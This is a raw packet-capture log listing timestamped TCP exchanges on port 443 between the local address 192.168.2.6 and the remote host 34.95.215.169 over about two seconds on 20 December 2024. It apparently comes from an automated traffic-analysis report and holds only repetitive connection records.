                                                                        Dec 20, 2024 15:43:27.683583975 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.684361935 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.684426069 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.686197996 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.686258078 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.687036037 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.687102079 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.688678026 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.688738108 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.690273046 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.690345049 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.691188097 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.691258907 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.771208048 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.771306038 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.773685932 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.773758888 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.776734114 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.776798010 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.779172897 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.779237032 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.781656981 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.781719923 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.784235954 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.784300089 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.787118912 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.787184954 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.789561033 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.789627075 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.792095900 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.792167902 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.794672012 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.794764042 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.797156096 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.797224045 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.800266981 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.800333977 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.802618980 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.802685022 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.805182934 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.805305958 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.807631969 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.807697058 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.810595989 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.810656071 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.885564089 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.885649920 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.888643026 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.888736010 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.891330957 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.891401052 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.893610001 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.893671989 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.896589041 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.896660089 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.899126053 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.899187088 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.901566982 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.901628017 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.936497927 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.936822891 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.938972950 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.939039946 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.942003012 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.942065954 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.944375992 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.944433928 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.946822882 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.946877956 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.962245941 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.962315083 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.989252090 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.989326000 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.991334915 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.991394997 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:27.992952108 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:27.993021011 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.077361107 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.077461004 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.079380035 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.079448938 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.081404924 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.081496954 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.083726883 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.083786011 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.086110115 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.086169004 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.088187933 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.088253021 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.090538979 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.090598106 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.128254890 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.128346920 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.130305052 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.130364895 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.132066011 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.132214069 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.134929895 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.135049105 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.136890888 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.136970997 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.153917074 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.154016018 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.155647039 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.155724049 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.181477070 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.181565046 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.183485985 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.183554888 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.185692072 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.185755014 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.271174908 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.271262884 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.273303032 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.273367882 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.275306940 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.275386095 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.277499914 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.277579069 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.279495955 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.279557943 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.282161951 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.282233000 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.284280062 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.284351110 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.321647882 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.321715117 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.323523998 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.323592901 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.325647116 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.325709105 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.328290939 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.328350067 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.330395937 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.330461979 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.347279072 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.347369909 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.397454023 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.397527933 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.399527073 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.399595976 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.401798010 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.401858091 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.462236881 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.462326050 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.464406967 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.464464903 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.466912985 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.466996908 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.469336033 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.469410896 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.471509933 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.471611023 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.473795891 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.473865986 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.475846052 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.475915909 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.512753010 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.512820005 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.515522003 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.515585899 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.517334938 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.517386913 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.519619942 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.519671917 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.521624088 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.521687984 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.544603109 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.544702053 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.588816881 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.588917971 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.590991020 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.591067076 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.593157053 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.593214989 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.654397011 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.654470921 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.656419992 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.656475067 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.658432007 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.658490896 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.660634995 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.660690069 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.662908077 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.662959099 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.665451050 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.665504932 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.667407036 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.667468071 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.705163002 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.705290079 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.706876040 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.707027912 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.708966970 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.709026098 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.711533070 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.711615086 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.713623047 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.713685989 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.715754032 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.715825081 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.738979101 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.739077091 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.782439947 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.782517910 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.784404993 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.784466982 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.786571980 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.786637068 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.848773956 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.848848104 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.851227999 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.851293087 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.853533983 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.853602886 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.855475903 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.855540037 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.858181000 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.858257055 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.860302925 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.860380888 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.862339973 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.862402916 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.898952961 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.899027109 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.901192904 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.901252031 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.903778076 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.903836966 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.905844927 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.905919075 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.907937050 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.908021927 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.931154966 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.931220055 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.974448919 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.974528074 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.976162910 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.976236105 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:28.978694916 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:28.978765011 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.040225029 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.040330887 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.042829037 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.042995930 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.044883966 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.044970989 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.047023058 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.047081947 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.050204039 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.050265074 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.051940918 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.052006960 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.053976059 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.054058075 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.091798067 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.091882944 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.092530966 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.092600107 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.094890118 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.094960928 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.097291946 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.097383022 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.099359035 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.099422932 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.123306036 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.123385906 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.166050911 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.166168928 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.167903900 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.167963028 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.170274019 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.170339108 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.232213974 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.232284069 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.234253883 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.234334946 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.236324072 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.236385107 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.238872051 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.238941908 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.240606070 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.240669012 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.243153095 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.243221045 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.245198011 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.245251894 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.282285929 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.282367945 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.284266949 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.284332991 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.286489964 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.286547899 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.288641930 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.288700104 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.291157961 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.291219950 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.293315887 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.293374062 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.316821098 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.316881895 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.360088110 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.360172033 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.362262011 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.362334967 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.364326000 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.364381075 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.426497936 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.426569939 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.428981066 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.429040909 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.431102037 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.431169033 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.433254957 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.433316946 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.435993910 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.436073065 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.438083887 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.438174009 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.440335035 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.440393925 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.477560997 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.477650881 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.479638100 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.479718924 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.481802940 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.481872082 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.484468937 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.484544039 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.486877918 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.486951113 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.508138895 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.508266926 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.550894976 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.550961971 CET49725443192.168.2.634.95.215.169
                                                                        Dec 20, 2024 15:43:29.553472042 CET4434972534.95.215.169192.168.2.6
                                                                        Dec 20, 2024 15:43:29.553531885 CET49725443192.168.2.634.95.215.169
